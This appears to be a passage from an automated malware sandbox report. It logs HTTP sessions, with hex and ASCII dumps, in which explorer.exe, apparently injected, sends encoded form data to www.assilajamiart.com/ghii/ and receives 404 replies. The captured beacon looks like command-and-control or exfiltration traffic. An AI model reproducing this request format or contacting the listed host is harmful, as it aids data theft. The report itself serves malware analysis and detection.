yaTA_X_WzyznzwAynAQRFwTGJLoUqsOJOHdIDAS1FzsoKHsSca5qusa0LZxuX3wQKiU7xu6Ej4ENHOKLCrIrCXBDo0gD7TZ0EMZv4Z8Tn0aOLqE8J5zbv8asO~zgnfCBpcD0xfgmn83CY9Df-ZKw5snIkdIvOdfFXhI2zLQJV6zEwJOZdslsrYGBsK9VOUclZFSyCqXJuj-wjZ1E5xQL4cEUndN5iDKtl5Fx2yMmU8HQrYeD6Wdrr~mIhUdxVc63WqaANAg8MzaMM7eAz7hJph-WjU8J2EXnFwvHB(4GQ2HJODqJwjbYxLxjI68jtXjuS1bvCM-yOF7JpIye6jq(kWm3bhmJqi12AGa~6skF5BLGwrh~N0ftMI4k5JjuH9DkD1RAxerCdR0BwBe8TFiFaDlAGWNDXZDzLxRi4tpKGkgAE5gVvF50CRrE6521NQMBLfAay7EtvfNB7izfZfKXnU0(VxaRp1aMg2QLKZycosQlr2_hBGtFyDxNRafUqv95W5_SEwc23dm5jnf7LOYJr4Ap6YOvPTwTQYrj3iIrYM1Ss6DR5kuC1UJZo0RqPAuCv1GpGBFM9~I5JUDn0GMNORS3eyu~XZHd_YAOM9Py2I4Afvt27nRES09ur5-5x7WiGr2SJTZ2DHtfIbUyBqYhpsJQ_yGEZKJhNP00cJErk1KJratlBorEsrA8If_Iwqq6ywIIaUmRSjh(iKaEl(9XcxTpVyCgDWW7C3IioR9roXOzVv4~nNfbYmJBVUSElVxpXicmcMqfcUqDJQPXOU3l5KWgtfSDgwAUAWgkSC4I0yqlOraKRpDUHHpVzDxRhPPSE5-q5Th~d0uhc6dwx9REGBv6XbNGV8UUvq1ZAQHJI(Sa0DkpVav8yUyLHUlSt7o8CBakd~MUhCkQEIlvj6PhFVfnvdhPCYzA8y_QY3KKgcM4oKSFlz6cSemYF~dTuL27gUogItKTrBuXrjNYfC0WiVhIDfmcypYzVJYzNIyGSEMDnQUsPjYOU04ejjCizz4uFLb~gCX2pOHn2J6dw6rNE7on6FeCV4iWpi6yNqQ(O(_jWrVy4f9HE1jcwLp77Z
                                                                                            Feb 18, 2023 13:06:46.904504061 CET131INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:06:46 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 5278
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                            Feb 18, 2023 13:06:46.904542923 CET132INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                            Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                            Feb 18, 2023 13:06:46.904563904 CET134INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                            Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                            Feb 18, 2023 13:06:46.904584885 CET135INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                            Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                            Feb 18, 2023 13:06:46.904601097 CET135INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                                            Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            20192.168.2.349720141.95.126.8980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:51.012238026 CET265OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.assilajamiart.com
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.assilajamiart.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.assilajamiart.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 38 34 30 33 34 6b 4e 39 54 73 4c 50 4f 42 32 73 41 7a 4a 71 4d 53 65 4e 31 2d 30 59 58 66 6f 75 78 5a 72 38 62 44 31 35 5a 38 48 59 6e 7a 4f 64 42 2d 67 46 51 6c 43 4e 4f 78 6c 49 7a 67 64 51 44 68 35 33 64 35 55 4b 62 4e 74 52 66 68 28 70 77 33 45 77 38 6b 33 51 39 4a 61 54 44 48 28 76 46 2d 63 6a 58 4f 47 73 7e 33 31 47 64 4e 68 49 68 32 54 52 4a 4b 55 65 67 79 44 68 47 6d 50 79 42 36 74 5a 72 66 66 52 48 74 7a 39 58 48 41 41 4d 63 42 67 31 64 53 55 44 50 34 4d 4a 5f 61 38 6d 72 43 65 4a 36 6e 4f 54 59 50 6d 4d 35 77 5f 6a 56 74 6a 4f 4e 66 79 76 4f 33 30 76 6d 6d 56 36 71 41 4d 47 69 37 64 66 71 47 49 4d 32 71 4f 6d 32 50 39 48 41 6e 70 4f 30 44 50 71 42 68 43 70 70 6f 45 4c 43 69 2d 6c 76 78 38 4c 76 72 72 6e 61 65 48 35 37 4e 43 42 68 76 39 73 55 4f 52 58 7a 56 67 55 67 76 75 54 58 6b 69 4a 78 37 68 79 72 44 74 76 54 6f 32 52 33 45 53 74 4d 6f 33 34 59 65 69 4e 59 7e 73 50 56 50 61 68 31 4a 68 5a 4d 70 55 64 69 41 39 71 44 6f 32 6d 32 48 6e 55 72 74 64 6b 52 47 65 62 44 6d 7a 45 44 6e 76 44 4b 57 58 5a 58 4b 45 52 4f 58 77 62 47 67 72 32 49 38 6f 79 31 63 4e 6c 6c 44 69 45 4d 58 55 6c 71 39 54 72 72 75 76 4a 68 38 56 51 74 75 32 47 2d 34 41 4a 49 37 48 39 44 33 42 28 48 67 61 48 42 79 4d 6f 32 6f 4c 31 67 41 34 4a 63 62 39 4b 36 5a 36 79 6f 43 54 74 52 68 46 59 6c 28 72 76 58 75 7a 59 51 72 67 70 44 65 6c 7a 4a 57 31 62 5a 37 44 4a 6a 59 56 38 6c 6e 4e 41 64 35 38 39 79 43 5a 58 31 28 69 79 50 51 41 49 47 65 4f 45 6b 66 4f 4c 41 55 2d 7e 6e 30 57 7a 6b 75 46 6c 31 56 50 4e 2d 63 72 76 6b 64 4a 42 73 4e 79 43 67 51 32 74 6d 74 50 59 67 53 37 41 63 35 32 79 46 68 79 79 6b 67 5f 65 6b 48 31 4d 5a 4a 31 54 35 50 53 33 37 69 53 37 73 7a 5f 31 69 7e 36 44 57 37 35 77 34 79 36 53 78 66 4e 75 4f 32 77 6a 69 77 65 74 6b 28 50 4b 46 30 66 48 51 37 71 49 77 73 42 41 67 58 69 41 62 52 51 72 35 4d 6b 57 30 58 47 6a 7a 4f 74 64 50 70 37 30 75 6b 76 4c 72 44 45 4e 4e 4d 36 6c 31 64 68 4e 37 74 77 73 2d 6f 7a 41 70 61 7a 58 70 76 4a 67 70 78 64 57 6e 4b 6d 6e 70 33 35 49 39 35 4a 52 67 6f 44 4e 48 49 70 4b 5a 35 7a 31 61 78 62 33 69 71 59 36 63 51 5f 65 78 62 74 70 65 5a 46 57 4b 61 51 43 41 38 34 59 4e 58 4a 31 69 58 45 75 64 4f 33 55 52 54 78 36 64 54 43 30 61 54 47 64 35 41 47 65 6d 6a 77 54 31 46 43 5a 72 4e 75 32 41 68 33 49 7a 4c 56 70 4b 75 51 39 42 57 70 38 65 67 4f 32 35 58 34 6a 78 48 57 59 66 51 62 56 35 61 52 5a 56 4e 66 44 47 42 64 72 6f 36 75 31 4e 77 49 66 2d 59 54 66 6d 72 78 47 6b 6c 66 57 68 48 76 63 4f 48 6e 47 4f 6f 38 4e 44 57 77 34 6f 41 6d 33 37 5a 56 49 37 49 62 53 65 46 6a 7a 48 51 52 37 59 66 6e 4c 6c 32 6e 39 69 72 4c 78 79 55 6d 4c 74 53 2d 43 75 39 65 46 78 71 62 62 76 63 73 6b 76 30 32 63 4d 68 6b 42 49 69 38 57 52 62 5f 6e 54 33 55 77 57 7a 30 53 47 7e 34 34 6b 41 64 70 41 59 75 55 57 54 6e 78 44 32 4e 39 6f 52 78 59 4f 75 44 6a 75 59 39 49 43 6b 44 79 72 49 56 50 58 34 34 6b 44 67 4c 67 6d 69 73 67 54 44 76 5a 34 6a 43 57 57 37 2d 33 47 4e 4d 39 38 28 43 53 78 64 34 56 5a 63 73 41 77 30 59 77 56 47 61 57 31 35 57 64 64 30 6f 4d 76 72 39 39 35 4c 75 41 31 50 61 58 79 4d 6e 4e 35 43 70 53 57 79 4e 53 44 34 32 69 57 4f 62 57 75 33 74 4a 42 50 33 76 56 7a 73 6c 50 64 49 4b 65 4e 4e 33 61 28 49 75 59 6b 52 56 50 65 39 66 59 56 56 38 62 33 41 72 4d 5a 35 73 42 53 32 74 73 6b 64 67 52 30 50 76 68 4b 58 6a 6d 72 61 36 5f 33 36 36 65 71 42 50 53 55 31 6a 53 66 68 48 76 45 58 4b 5f 39 42 61 5a 46 4d 30 36 4f 47 61 5a 74 74 73 58 63 4c 34 59 7a 35 48 31 75 37 69 5f 46 39 36 6e 53 2d 52 63 54 49 61 56 71 4d 57 35 32 4c 38 58 64 76 4a 52 33 78 4a 77 6d 39 76 66 36 54 59 37 4d 6c 59 43 6d 35 49 4b 35 6e 30 51 4b 4b 7e 4c 4d 42 34 5a 48 46 58 34 46 6e 73 72 54 36 37 71 76 7a 34 43 47 7a 45 51 52 61 6f 50 28 78 6c 37 51 44 4d 44 30 6d 7e 52 48 44 77 78 33 42 57 36 39 78 6f 6b 45 51 58 52 32 73 62 49 4e 43 54 78 6a 66 28 38 49 47 35 76 34 34 66 79 75 4b 47 34 41 6f 6c 71 44 64 35 57 52 2d 33 4e 74 5a 4c 4a 45 54 7a 6a 73 75 52 39 35 42 47 58 6f 6b 53 56 33 71 4d 59 44 55 49 50 50 51 50 79 34 65 38 31 6a 4a 66 30 70 32 77 36 51 41 58 71 76 6f 6d 59 54 76 32 49 76 62 75 6c 4a 69 57 6c 42 6a 42 4e 64 30
                                                                                            Data Ascii: Y5=84034kN9TsLPOB2sAzJqMSeN1-0YXfouxZr8bD15Z8HYnzOdB-gFQlCNOxlIzgdQDh53d5UKbNtRfh(pw3Ew8k3Q9JaTDH(vF-cjXOGs~31GdNhIh2TRJKUegyDhGmPyB6tZrffRHtz9XHAAMcBg1dSUDP4MJ_a8mrCeJ6nOTYPmM5w_jVtjONfyvO30vmmV6qAMGi7dfqGIM2qOm2P9HAnpO0DPqBhCppoELCi-lvx8LvrrnaeH57NCBhv9sUORXzVgUgvuTXkiJx7hyrDtvTo2R3EStMo34YeiNY~sPVPah1JhZMpUdiA9qDo2m2HnUrtdkRGebDmzEDnvDKWXZXKEROXwbGgr2I8oy1cNllDiEMXUlq9TrruvJh8VQtu2G-4AJI7H9D3B(HgaHByMo2oL1gA4Jcb9K6Z6yoCTtRhFYl(rvXuzYQrgpDelzJW1bZ7DJjYV8lnNAd589yCZX1(iyPQAIGeOEkfOLAU-~n0WzkuFl1VPN-crvkdJBsNyCgQ2tmtPYgS7Ac52yFhyykg_ekH1MZJ1T5PS37iS7sz_1i~6DW75w4y6SxfNuO2wjiwetk(PKF0fHQ7qIwsBAgXiAbRQr5MkW0XGjzOtdPp70ukvLrDENNM6l1dhN7tws-ozApazXpvJgpxdWnKmnp35I95JRgoDNHIpKZ5z1axb3iqY6cQ_exbtpeZFWKaQCA84YNXJ1iXEudO3URTx6dTC0aTGd5AGemjwT1FCZrNu2Ah3IzLVpKuQ9BWp8egO25X4jxHWYfQbV5aRZVNfDGBdro6u1NwIf-YTfmrxGklfWhHvcOHnGOo8NDWw4oAm37ZVI7IbSeFjzHQR7YfnLl2n9irLxyUmLtS-Cu9eFxqbbvcskv02cMhkBIi8WRb_nT3UwWz0SG~44kAdpAYuUWTnxD2N9oRxYOuDjuY9ICkDyrIVPX44kDgLgmisgTDvZ4jCWW7-3GNM98(CSxd4VZcsAw0YwVGaW15Wdd0oMvr995LuA1PaXyMnN5CpSWyNSD42iWObWu3tJBP3vVzslPdIKeNN3a(IuYkRVPe9fYVV8b3ArMZ5sBS2tskdgR0PvhKXjmra6_366eqBPSU1jSfhHvEXK_9BaZFM06OGaZttsXcL4Yz5H1u7i_F96nS-RcTIaVqMW52L8XdvJR3xJwm9vf6TY7MlYCm5IK5n0QKK~LMB4ZHFX4FnsrT67qvz4CGzEQRaoP(xl7QDMD0m~RHDwx3BW69xokEQXR2sbINCTxjf(8IG5v44fyuKG4AolqDd5WR-3NtZLJETzjsuR95BGXokSV3qMYDUIPPQPy4e81jJf0p2w6QAXqvomYTv2IvbulJiWlBjBNd0Bio5jrzFnVdOrwA2zzxQ~-36BMGSFVXgbDzCrJgFtGJ_~F(dGonDt2vwiUbMhcz5xgoWgTsYCUJhlVtdy9VklUPxuXOw9Suc8o1WqmcXUxXnqkYNT3F9gUSq5RGgaStPF50qUgv5Thn6w1t2svMi8HlaetItffn6NKfUfhmY3OJZei(8dGoayEe8kDedimdzRAZXPcjaHWKM5cQkTUjMB9xnWyF5mPG8ywv3qzjVucYK0UlrzteHdIVqiGmDrFR3STBqa_gEAN8g~zZ2N-Ij~R(sycGhaIDEybHov4DfJhVwC8H37_OGNwwewQh6AaRKLuFRy6ur3ghD3TDaMdUVpFL73U71Hu0YwQX5e0ZIn0YXgf0EJ-WnXxWhtFvIpb7kxvnXYBCFzFKybwXoZb1sP3W9UI6RxFKi2Ou6aHjv8Nj2vnQULI6goV4xkYNDw1BIgE6rsjX4WgZX57SsxgQoeZr5JYUKBWR1zg7BBxMm0V5iSSTNSaDBvym9nfjMVloNMk8hQnlZwyPWSVSewaO5pvlsE5U0MeiqDcoP5yXizlcwkormzIFu56qcidaVt2J6omx1rNGMacz8WXmc3fRdhJOogmFAJZS9bElWakH0fUwxdgtv2Dhs97vFoqzJI-IrQZKdv-bTkbdi250KkJKwCdgjvsoiu_6ruBxdBJ4fYd6HZgAWVUJS1-9LH3~KrC35B1S58lLHz94zZc85GziiWOrgFm3-lPlRY-l2TkY0WDw1E6rYetraGWI53rg9g4htUvT7q7fN14SHqw1ixOlflkBtu3ple3ghjRMz3yCECX(6b2I_6142oAggCjBVI5EkNxZTaqcMTl0iTXuSwotvmx4Fq2E688Jd9OmYAmehBj~LeHiveh9_yCEWxG4VusYRof432woNzgdlJ6IbkN88a-bz8KDkY57tKu~27z(D5ZEToZBAjXwyJk2N6_mZXyMgUxYNBC3pBv5LDQ15X7lJEjHcXvsRNiFctIoqOHW2Li3fdOeHQP4aEjQ4b9qTYMccZcNSei0OS3F76dXyKOTV1WCFzagNuoDZWeYPld44e1XNFps277IhEohFUYUwopTINq1Xkn7RebIWLsQ8MNk4(Yhd8Bw2KNxFPQFmDjR9meKVFfKK6dTsiDed1Jx1fPhQUtYByY2eBhr-fAy7z-uHiaqIDxodaS8ZhBWZifLhSpt1NAMqwAbl0iwdhV8QIf4K2ib8lY5i7uRzj9~_1YT54CCcxqUbHgtpW8TIPwPslMYlDdaOGtJiyIKluneZsPIGT0mIzP7ffv1wmkobTrr0xXCTzpyXc8GrB8QoqQLJocC482ZBe8N3DcsOLApoZO8c26oJaSHINqyP~WhAZcLcEXqH1wT-Z-AiuhcABjZgk7t7zaAcZdDAD8d_XfsNLULbKw6tz8YEjoTWZi6IfTgh(1oipvEtLDlsrLEfJWiNe5awl5f8B8UFHnv9fQTjrrPfCzdBzRMxUujCef2DPgAdDVY1HQb-2rw6~dIESHkGVaqT9rMNsSr76Y6p9_oOnGm1HVhBeXBGayvadfbAosSUwFj7fa0U8KWADwRCUdtw2re9ojZTvZeE2d4MJzY2fa3FkWIniw7ven(iJ7h66MKXzh3QScs1nBqzIbpZb9rg(M0qwhGj6BwdACsd~0D4HuHUpx9N5G(YrUkPxFfrdGyOM9(KxDmnS6(AkPmIfue3FhHBVcXXk044fnj-LJjaG_WKQg3bbboCgWBTY7M3lsFq8GWMh3o-UKNy8gT2FipLv1fMR9uqg1nZ~E1Fg4CyRfLvMatxspsLIqS-t9uhgPZMkbNglWpuT775CZra16Kt9Vu_6ElugX9NfyRRloPXaF19Q37IyAL76ilA18zhUQpEKYjFF40s4-Vgb-SNrnQLLMxMxJL0~zq3DAExQYClHkxug-8_tE7YrQYDg3fB0GO_LFbErx3KmwxErGRLYLpl0dp3nJTlueJchgIdW4McRrxeybDEVbdW~Rp0JDm9CKQSxAlkLNEyiWiIDmqyPmkL5RB0W3U-BIACwIaASr4RMIjtpZv0ZLRvSPtjMtGXyN6zvwIpcFWiSTlQN9r5ss0Ic4F8A7iqtsXYB0MZhe8oSFyqUrxoDMtvq51tdn3cdo0waPWOAHayzzvmRY0pYZLqwSRYn_RP6faPk1YG1u2uIK0yylDVYyNgAXAvrQjTp3~m77ZqWhAa0tq8eMsgU1HUxuaqXqESezaqLdQrDzIF60LOERZ_EbYt(lxH(8B7V6Nt~LDJq0e7FuMt2isqQTlUzer77xazvAYKaeKbYaWZaUeuRl~yIt(K2BfgmaUl1jjzpr1Dh-bj9R9UbYUnvyzw4qFfmLRNbAoTZu4EcrzjO9B7CFLGzgJ4jHTHbC3tr0EHI5mYwMNCHKaAnrWK9PyTb97JwcGXXjtqt3Aw97n7TTY3W-O0OQ6-zu9T2vS7R21DmpzqC9gR4r4HZTqXa4OnqRsbmt4lf_0x3ZQBNamI37jMyWswanZq3HatYXSz8c~ZOzBnNtVz5nbfnJ(42UjZ4sVnjHfwMfi7ma3BeISB7o01KKxc2Ndiz9H1WIxVq6nAV3myl0PFBvO_qtefGq(Rq9cWXvWVceHkyX~3Jdbgqxeq~D75ux2sYV3AcuVe2-TGh_VEh6UxUdboV88ZsyX4ulPMAmJYyqerxiwIONMe3cKXXbbL8N3IS6uyLOY8uEu9HvngE_jAb5SX635
                                                                                            Feb 18, 2023 13:07:51.177112103 CET266INHTTP/1.1 404 Not Found
                                                                                            Connection: close
                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            link: <https://assilajamiart.com/wp-json/>; rel="https://api.w.org/"
                                                                                            transfer-encoding: chunked
                                                                                            content-encoding: gzip
                                                                                            vary: Accept-Encoding,User-Agent
                                                                                            date: Sat, 18 Feb 2023 12:07:51 GMT
                                                                                            server: LiteSpeed
                                                                                            Data Raw: 33 61 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 93 e3 b6 b1 e0 cf d9 aa fb 1f 60 4d 79 77 64 93 1c 92 fa 1c 8e 67 13 c7 b1 ab ae 2a b9 bc 7a 4e ea ee 9d bd b7 05 91 90 44 2f 45 2a 24 35 1f 99 e8 7f bf ea 06 40 82 24 28 52 1f b3 49 5e d9 ae 38 23 10 e8 6e 34 80 46 a3 bb d1 f8 e6 8b 3f fc f9 bb bf fc d7 7f 7c 4f d6 f9 26 7a ff 3f de 7c 03 ff 4f 22 1a af ee 07 2c 36 ff fa e3 00 0b 19 0d e0 ff 37 2c a7 c4 5f d3 34 63 f9 fd e0 af 7f f9 c1 9c e3 77 2c 8f e9 86 dd 0f 1e 42 f6 b8 4d d2 7c 40 fc 24 ce 59 9c df 0f 1e c3 20 5f df 07 ec 21 f4 99 89 3f 0c 12 c6 61 1e d2 c8 cc 7c 1a b1 7b 07 a1 44 61 fc 89 a4 2c ba 1f 6c d3 64 19 46 6c 40 d6 29 5b de 0f d6 79 be cd bc 9b 9b d5 66 bb b2 92 74 75 f3 b4 8c 6f 1c 6c 24 89 42 e4 ef d2 64 91 e4 d9 bb 02 f5 bb 38 09 e3 80 3d 19 64 99 44 51 f2 f8 8e dc bc 7f f3 e6 37 df 7c 61 9a e4 2f eb 30 23 59 98 33 12 66 24 d9 e6 e1 26 fc 3b 0b c8 63 98 af 49 be 66 e4 bf 12 9a e5 e4 c7 ef ff 4c b6 d1 6e 15 c6 e4 c1 b9 b5 9c 11 31 89 24 e7 19 6a 58 7e b2 b9 79 4c d2 60 9b b2 2c bb e1 75 b3 9b 8c 25 37 c4 34 df bf f9 cd 37 79 98 47 ec fd 7f d0 15 23 71 92 93 65 b2 8b 03 62 92 6f b3 2c 8c c8 b7 bf d0 4d 48 be 4d f3 6f 6e 78 bd 37 bf e1 5c de a6 c9 96 a5 f9 f3 fd 20 59 79 51 02 6c 52 58 ca e2 8f 7f fd 71 00 bd d1 55 47 48 4a ed 2e dc ad 80 80 3d 1f 81 b5 0a b0 1a dd a2 6d e6 a7 e1 36 27 f9 f3 96 dd 0f e8 76 1b 85 3e cd c3 24 be 89 82 af 7f c9 92 78 40 fc 88 66 d9 fd 00 99 66 66 fe 9a 6d a8 b9 4a e9 76 3d 78 ff 32 f8 1d 4e 96 a7 7c e0 15 83 cd ab c0 70 0f 8c c1 